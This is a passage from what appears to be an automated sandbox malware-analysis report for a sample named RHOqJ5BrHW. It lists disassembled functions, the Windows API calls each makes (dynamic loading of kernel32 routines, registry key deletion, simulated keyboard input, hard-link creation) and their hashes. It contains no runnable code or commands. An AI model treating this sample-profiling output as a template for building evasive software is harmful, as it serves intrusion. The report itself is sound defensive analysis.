                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                    • Instruction ID: 2804eae11e63a6cdf5dc77719092a106025b2355144583099518b1b6bc138a9c
                                    • Opcode Fuzzy Hash: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                    • Instruction Fuzzy Hash: 2ED0C772544717AFD720AFA5F80D741B6D8BF14711F10895AF555D2264DBB0C8818750
                                    Function 009E2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,009E21FB,?,009E23EF), ref: 009E2213
                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 009E2225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetProcessId$kernel32.dll
                                    • API String ID: 2574300362-399901964
                                    • Opcode ID: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                    • Instruction ID: 5b6b0131e9b847ac79e0afc22dc468d1071ca1c70287b67b847e0e7da384a38e
                                    • Opcode Fuzzy Hash: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                    • Instruction Fuzzy Hash: F1D0A736800716AFC7269FB1F808601B6DCFB0C301F104819F852E2250DB70DC818760
                                    Function 0098434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,009841BB,00984341,?,0098422F,?,009841BB,?,?,?,?,009839FE,?,00000001), ref: 00984359
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0098436B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                    • Instruction ID: 1835106bd3f34d262edc21a743e2aa2c6a30bf676b9bd655de841806f8e69cbd
                                    • Opcode Fuzzy Hash: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                    • Instruction Fuzzy Hash: DCD0C772544717BFD720AFF5E809741B6D8BF14715F10496AF496D2250EBB0D8818750
                                    Function 009C0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,009C051D,?,009C05FE), ref: 009C0547
                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 009C0559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1071820185
                                    • Opcode ID: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                    • Instruction ID: ab2ddc5efcc148aaaf3d81dce8496a87e0dbcbc065730a65941a9b4adba1653c
                                    • Opcode Fuzzy Hash: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                    • Instruction Fuzzy Hash: FFD0C771944716EFD720DFA5E808B41B6E8BB54711F10C91DF596D2250DA70C8818B51
                                    Function 009C0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,009C052F,?,009C06D7), ref: 009C0572
                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 009C0584
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1587604923
                                    • Opcode ID: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
                                    • Instruction ID: bc152a1b21c30e85adc20d5ef0b8b3af38288bd593f2cbb438ea42f6525110cd
                                    • Opcode Fuzzy Hash: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
                                    • Instruction Fuzzy Hash: 35D0C771944716EFDB209FB5E809F42B7E8BB44711F108A1DF855D2150DB70D4C18B61
                                    Function 009DECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,009DECBE,?,009DEBBB), ref: 009DECD6
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009DECE8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
                                    • Instruction ID: 79f04d5133e88eef0bf619b38d07b070cc774b433db98c0ce2f3e3a89bf5662e
                                    • Opcode Fuzzy Hash: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
                                    • Instruction Fuzzy Hash: 2AD0A731450723AFCB20AFF0E848702BAF8BB04300F10C82AF885D2250DF70D8818750
                                    Function 009DBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009DBAD3,00000001,009DB6EE,?,00A1DC00), ref: 009DBAEB
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009DBAFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
                                    • Instruction ID: c6071d56c58064cc046e6f9f827a2a9f877316d8bad0745fc80a8b09966bd7ea
                                    • Opcode Fuzzy Hash: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
                                    • Instruction Fuzzy Hash: C4D0A731940712EFC7309FA1F849B15B6D8BB05300F11881BF843D2254DB74D881C750
                                    Function 009E3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,009E3BD1,?,009E3E06), ref: 009E3BE9
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009E3BFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
                                    • Instruction ID: 1147cd17505ced4a092d60e47cee39493fb32d1fce30acf73036bf8ec80665f6
                                    • Opcode Fuzzy Hash: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
                                    • Instruction Fuzzy Hash: F0D09EB1500756EBD7219FE5E809642BBA8AB09715F208919E895A2150DBB4DC818E50
                                    Function 009B9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
                                    • Instruction ID: abd2eb683633ae745717f86b5aae3eddf91daf31f9b9889e362d515acf801f19
                                    • Opcode Fuzzy Hash: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
                                    • Instruction Fuzzy Hash: 98C15E75A1021AEFCB14CF94C984BEEBBB5FF88710F108598EA45AB291D730DE41DB90
                                    Function 009DAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 009DAAB4
                                    • CoUninitialize.OLE32 ref: 009DAABF
                                      • Part of subcall function 009C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
                                    • VariantInit.OLEAUT32(?), ref: 009DAACA
                                    • VariantClear.OLEAUT32(?), ref: 009DAD9D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 28384c90c10f122365069720b2aeb45f7fef5e3ffa0829d7e1ac6231b777cfaa
                                    • Instruction ID: f13202030c8f0b39af16868451bcfc41aeb6256848b6e04319af2b4fc360330a
                                    • Opcode Fuzzy Hash: 28384c90c10f122365069720b2aeb45f7fef5e3ffa0829d7e1ac6231b777cfaa
                                    • Instruction Fuzzy Hash: 2AA16D352447019FCB15EF64C881B2AB7E5BF88720F14884AF9969B3A1CB34FD05CB86
                                    Function 009B91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: 2f9441ec44068b547fc3da2e7562236bdd0a5026767ad41ae18d88875001e82f
                                    • Instruction ID: fdcafd98a9254b8c56aa77b9f8c43249c54e9e823eee82da22121c98d32a8112
                                    • Opcode Fuzzy Hash: 2f9441ec44068b547fc3da2e7562236bdd0a5026767ad41ae18d88875001e82f
                                    • Instruction Fuzzy Hash: 9951BA306247069BDB24AF69D9D5BAEB3E9EF85324F20881FE756C72D1DB349881C701
                                    Function 009EC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(00C98820,?), ref: 009EC544
                                    • ScreenToClient.USER32(?,00000002), ref: 009EC574
                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 009EC5DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
                                    • Instruction ID: f8114fe27cc30cd16a31e7187209b9f9113c09ee70af26d1a7397635c161ae32
                                    • Opcode Fuzzy Hash: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
                                    • Instruction Fuzzy Hash: F75196B5900249EFCF11DFA9C880AAE77B9FF85720F108659F89597291D730ED82CB50
                                    Function 009BC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009BC462
                                    • __itow.LIBCMT ref: 009BC49C
                                      • Part of subcall function 009BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 009BC753
                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 009BC505
                                    • __itow.LIBCMT ref: 009BC55A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    • Opcode ID: 4cc64a4b4ca45b56f5c2da5f71f21bf4330d8429093d71efc2908ebfc03ec7e8
                                    • Instruction ID: 519e3f4d66e97b5f5844373589aa1c59ddf60e0cdec928e1f90033f5ba8b617a
                                    • Opcode Fuzzy Hash: 4cc64a4b4ca45b56f5c2da5f71f21bf4330d8429093d71efc2908ebfc03ec7e8
                                    • Instruction Fuzzy Hash: 9841FAB1A00609AFDF21EF54CD56FEE7BB9AF89710F000019F905A7291DB749A49CBA1
                                    Function 009C390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009C3966
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 009C3982
                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009C39EF
                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 009C3A4D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 15e598935d14f6003645d81029ec5a2989f5fdd280b2e841b4cd7f015f690a0e
                                    • Instruction ID: 467051ae2ab1b8dfd6b6590aa1481791d63a8161f966ccd3a7cbab34fe2022fa
                                    • Opcode Fuzzy Hash: 15e598935d14f6003645d81029ec5a2989f5fdd280b2e841b4cd7f015f690a0e
                                    • Instruction Fuzzy Hash: 5F41F570E04248EAEF308BA48805FFDBBB99B59310F04C15EE4C1A22D1C7B49E95D767
                                    Function 009CE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009CE742
                                    • GetLastError.KERNEL32(?,00000000), ref: 009CE768
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009CE78D
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009CE7B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 11710ba86c6022c83b3bacd9e97dbdd4d26478e8dd0c260a1429575a3ec702b0
                                    • Instruction ID: 5c498d69d615c0097820fc0fc3b303d99c151be107357307ebbf9d6021512742
                                    • Opcode Fuzzy Hash: 11710ba86c6022c83b3bacd9e97dbdd4d26478e8dd0c260a1429575a3ec702b0
                                    • Instruction Fuzzy Hash: 0C416539A00610DFCF15EF54C845A5DBBE5BF89720F088089E946AB3A2CB30FD01DB82
                                    Function 009EB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009EB5D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 379649823027c76d6cd54951de7541507c40460daec296363c5add3fa1e8dbd3
                                    • Instruction ID: 7fefc89ed04bac5aa17eecd9363550ea6355d8c097c0571b4415be2e9bedcd21
                                    • Opcode Fuzzy Hash: 379649823027c76d6cd54951de7541507c40460daec296363c5add3fa1e8dbd3
                                    • Instruction Fuzzy Hash: 44313378601288BFEF22CF9ACC88FAE7768EB06720F104502F601D61E1CB34ED418B51
                                    Function 009ED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 009ED807
                                    • GetWindowRect.USER32(?,?), ref: 009ED87D
                                    • PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
                                    • MessageBeep.USER32(00000000), ref: 009ED8FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: 6ef98f1d8e68f4c1abdaa8ef91fb8a226ecf5c81ea2a2e29439d2dd8cceb8784
                                    • Instruction ID: c323c19567719a00e549de4c53b79ee95312edea4ecf49a817fe3beaf8c77411
                                    • Opcode Fuzzy Hash: 6ef98f1d8e68f4c1abdaa8ef91fb8a226ecf5c81ea2a2e29439d2dd8cceb8784
